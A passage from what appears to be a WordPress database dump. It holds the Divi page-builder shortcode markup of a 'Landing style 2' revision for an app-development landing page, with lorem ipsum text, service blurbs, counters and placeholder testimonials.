sed magna dictum porta. Curabitur aliquet quam id dui posuere blandit. Donec sollicitudin molestie malesuada. Pellentesque in ipsum id orci porta dapibu</p>\n<p><em>50k+ Downloads • 2k+ Reviews</em></p>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"Poppins|600|||||||\" text_text_color=\"#000000\" text_font_size=\"30px\" text_line_height=\"80px\" header_font=\"||||||||\" border_radii=\"on|100px|100px|100px|100px\" border_width_all=\"4px\" border_color_all=\"#3fd3ce\" text_orientation=\"center\" max_width=\"88px\" custom_padding=\"|||||false\" locked=\"off\"]<p>4.4</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"90px|||\" custom_padding_tablet=\"0px||\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_button button_text=\"Download\" button_alignment=\"right\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#3fd3ce\" button_bg_color=\"#e0f9f9\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.08)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"||-280px\" custom_margin_tablet=\"||-280px\" custom_margin_last_edited=\"on|phone\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-03.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"-10%||\" custom_margin_tablet=\"0%||\" custom_margin_last_edited=\"on|tablet\" animation_style=\"roll\" animation_intensity_roll=\"1%\"][/et_pb_image][et_pb_button button_text=\"Full Portfolio\" button_alignment=\"center\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" next_background_color=\"#ffffff\" admin_label=\"Services\" _builder_version=\"3.22\" background_color=\"#28283f\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/08/Artboard.png\" background_size=\"initial\" custom_margin=\"|40px||40px||true\" custom_margin_phone=\"|10px||10px||true\" custom_margin_last_edited=\"on|desktop\" bottom_divider_style=\"wave\" bottom_divider_height=\"33vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" background_layout=\"dark\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>What We Offer </h2>\n<p>Pellentesque in ipsum id orci porta dapibus. Nulla quis lorem ut libero malesuada feugiat. Sed porttitor lectus nibh. Cras ultricies ligula sed magna dictum porta. Curabitur aliquet quam id dui posuere blandit. Donec sollicitudin molestie malesuada. Pellentesque in ipsum id orci porta dapibus. </p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" locked=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Mobile App Development\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-02.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"12px\" body_line_height=\"2em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" background_layout=\"dark\" custom_margin=\"30px||30px||true\" custom_padding=\"||||false|false\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Roadmap & Strategy\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-01.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"12px\" body_line_height=\"2em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" background_layout=\"dark\" custom_margin=\"30px||30px||true\" custom_padding=\"||||false|false\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Backend & API Development\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-04.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"12px\" body_line_height=\"2em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" background_layout=\"dark\" custom_margin=\"30px||30px||true\" custom_padding=\"||||false|false\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" locked=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"User Centric Experiences\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-03.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"12px\" body_line_height=\"2em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" background_layout=\"dark\" custom_margin=\"30px||30px||true\" custom_padding=\"||||false|false\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"WorldClass Support\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-07.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"12px\" body_line_height=\"2em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" background_layout=\"dark\" custom_margin=\"30px||30px||true\" custom_padding=\"||||false|false\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Data backups\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-05.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"12px\" body_line_height=\"2em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" background_layout=\"dark\" custom_margin=\"30px||30px||true\" custom_padding=\"||||false|false\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" locked=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product Updates\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-09.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"12px\" body_line_height=\"2em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" background_layout=\"dark\" custom_margin=\"30px||30px||true\" custom_padding=\"||||false|false\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Award Winning quality\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-08.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"12px\" body_line_height=\"2em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" background_layout=\"dark\" custom_margin=\"30px||30px||true\" custom_padding=\"||||false|false\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"BlockChain Intergration\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-10.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"12px\" body_line_height=\"2em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" background_layout=\"dark\" custom_margin=\"30px||30px||true\" custom_padding=\"||||false|false\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" custom_margin=\"60px||\" custom_padding=\"|0px|0|0px|false|false\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" column_structure=\"2_5,3_5\"][et_pb_column type=\"2_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"1%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" admin_label=\"Testimonials\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Launched Apps\" number=\"300+\" percent_sign=\"off\" _builder_version=\"3.19.6\" title_font=\"Poppins|600||on|||||\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"1.6em\" number_font=\"Poppins|600|||||||\" number_text_color=\"#1ca5ff\" number_font_size=\"42px\" number_line_height=\"122px\" custom_margin=\"||10px\" locked=\"off\"][/et_pb_number_counter][et_pb_number_counter title=\"Average App Rating\" number=\"4.5\" percent_sign=\"off\" _builder_version=\"3.19.6\" title_font=\"Poppins|600||on|||||\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"1.6em\" number_font=\"Poppins|600|||||||\" number_text_color=\"#1ca5ff\" number_font_size=\"42px\" number_line_height=\"122px\" custom_margin=\"||10px\" locked=\"off\"][/et_pb_number_counter][et_pb_number_counter title=\"App Downloads\" number=\"1.2M\" percent_sign=\"off\" _builder_version=\"3.19.6\" title_font=\"Poppins|600||on|||||\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"1.6em\" number_font=\"Poppins|600|||||||\" number_text_color=\"#1ca5ff\" number_font_size=\"42px\" number_line_height=\"122px\" custom_margin=\"||10px\" locked=\"off\"][/et_pb_number_counter][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner _builder_version=\"3.25\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_button button_text=\"Our Work\" button_alignment=\"center\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text quote_border_color=\"#ab5eff\" _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" quote_font=\"||on||||||\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" custom_margin=\"||50px\" locked=\"off\"]<blockquote>\n<p>\"Sed porttitor lectus nibh. Vivamus suscipit tortor eget felis porttitor volutpat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Sed porttitor lectus nibh. Donec sollicitudin molestie malesuada. Nulla porttitor accumsan tincidunt. Proin eget tortor risus\"</p>\n</blockquote>\n<p><strong>John Doe, Extra Sapce</strong></p>[/et_pb_text][et_pb_text quote_border_color=\"#ab5eff\" _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" quote_font=\"||on||||||\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" custom_margin=\"||50px\" locked=\"off\"]<blockquote>\n<p>\"Nulla quis lorem ut libero malesuada feugiat. Nulla quis lorem ut libero malesuada feugiat. Pellentesque in ipsum id orci porta dapibus. Nulla quis lorem ut libero malesuada feugiat. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Nulla quis lorem ut libero\"</p>\n</blockquote>\n<p><strong>Donna Smith, Monarch Social</strong></p>[/et_pb_text][et_pb_text quote_border_color=\"#ab5eff\" _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" quote_font=\"||on||||||\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" custom_margin=\"||50px\" locked=\"off\"]<blockquote>\n<p>\"Sed porttitor lectus nibh. Nulla quis lorem ut libero malesuada feugiat. Pellentesque in ipsum id orci porta dapibus. Nulla porttitor accumsan tincidunt. Quisque velit nisi, pretium ut lacinia in, elementum id enim. Donec rutrum congue leo\"</p>\n</blockquote>\n<p><strong>Dave Block, Bloom Lead Gen</strong></p>[/et_pb_text][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Project Request\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#3cd1ff\" background_color_gradient_end=\"#1ca5ff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset3\" box_shadow_vertical=\"45px\" box_shadow_blur=\"135px\" box_shadow_spread=\"-45px\" box_shadow_color=\"rgba(28,165,255,0.76)\" custom_margin=\"|6vw||6vw||true\" custom_padding=\"|30px||30px||true\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" background_layout=\"dark\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Already Know the Details of Your Project?</h2>\n<p>Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula.</p>[/et_pb_text][et_pb_button button_text=\"Online Project Application\" button_alignment=\"center\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#000000\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Social\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|0|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_social_media_follow _builder_version=\"3.19.6\" border_radii=\"on|40px|40px|40px|40px\" text_orientation=\"center\"][et_pb_social_media_follow_network social_network=\"facebook\" _builder_version=\"3.19.6\" background_color=\"#3b5998\" custom_margin=\"|9px||9px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" follow_button=\"off\" url_new_window=\"on\"]facebook[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"twitter\" _builder_version=\"3.19.6\" background_color=\"#00aced\" custom_margin=\"|9px||9px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" follow_button=\"off\" url_new_window=\"on\"]twitter[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"instagram\" _builder_version=\"3.19.6\" background_color=\"#ea2c59\" custom_margin=\"|9px||9px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" follow_button=\"off\" url_new_window=\"on\"]instagram[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"dribbble\" _builder_version=\"3.19.6\" background_color=\"#ea4c8d\" custom_margin=\"|9px||9px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" follow_button=\"off\" url_new_window=\"on\"]dribbble[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"youtube\" _builder_version=\"3.19.6\" background_color=\"#a82400\" custom_margin=\"|9px||9px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" follow_button=\"off\" url_new_window=\"on\"]youtube[/et_pb_social_media_follow_network][/et_pb_social_media_follow][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Call to Actions\" _builder_version=\"3.22\"][et_pb_fullwidth_header text_orientation=\"center\" button_one_text=\"Divi Marketplace\" button_two_text=\"Monarch Apps\" _builder_version=\"3.19.6\" title_font=\"||||||||\" subhead_font=\"||||||||\" background_color=\"#ffffff\" custom_button_one=\"on\" button_one_text_size=\"12px\" button_one_text_color=\"#ab5eff\" button_one_bg_color=\"#f0e8ff\" button_one_border_width=\"10px\" button_one_border_color=\"rgba(0,0,0,0)\" button_one_border_radius=\"100px\" button_one_letter_spacing=\"1px\" button_one_font=\"Poppins|600||on|||||\" button_one_icon=\"%%190%%\" button_one_on_hover=\"off\" custom_button_two=\"on\" button_two_text_size=\"12px\" button_two_text_color=\"#3fd3ce\" button_two_bg_color=\"#e0f9f9\" button_two_border_width=\"10px\" button_two_border_color=\"rgba(0,0,0,0)\" button_two_border_radius=\"100px\" button_two_letter_spacing=\"1px\" button_two_font=\"Poppins|600||on|||||\" button_two_icon=\"%%190%%\" button_two_on_hover=\"off\" custom_padding=\"0px||\"][/et_pb_fullwidth_header][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 15:52:02','2019-08-08 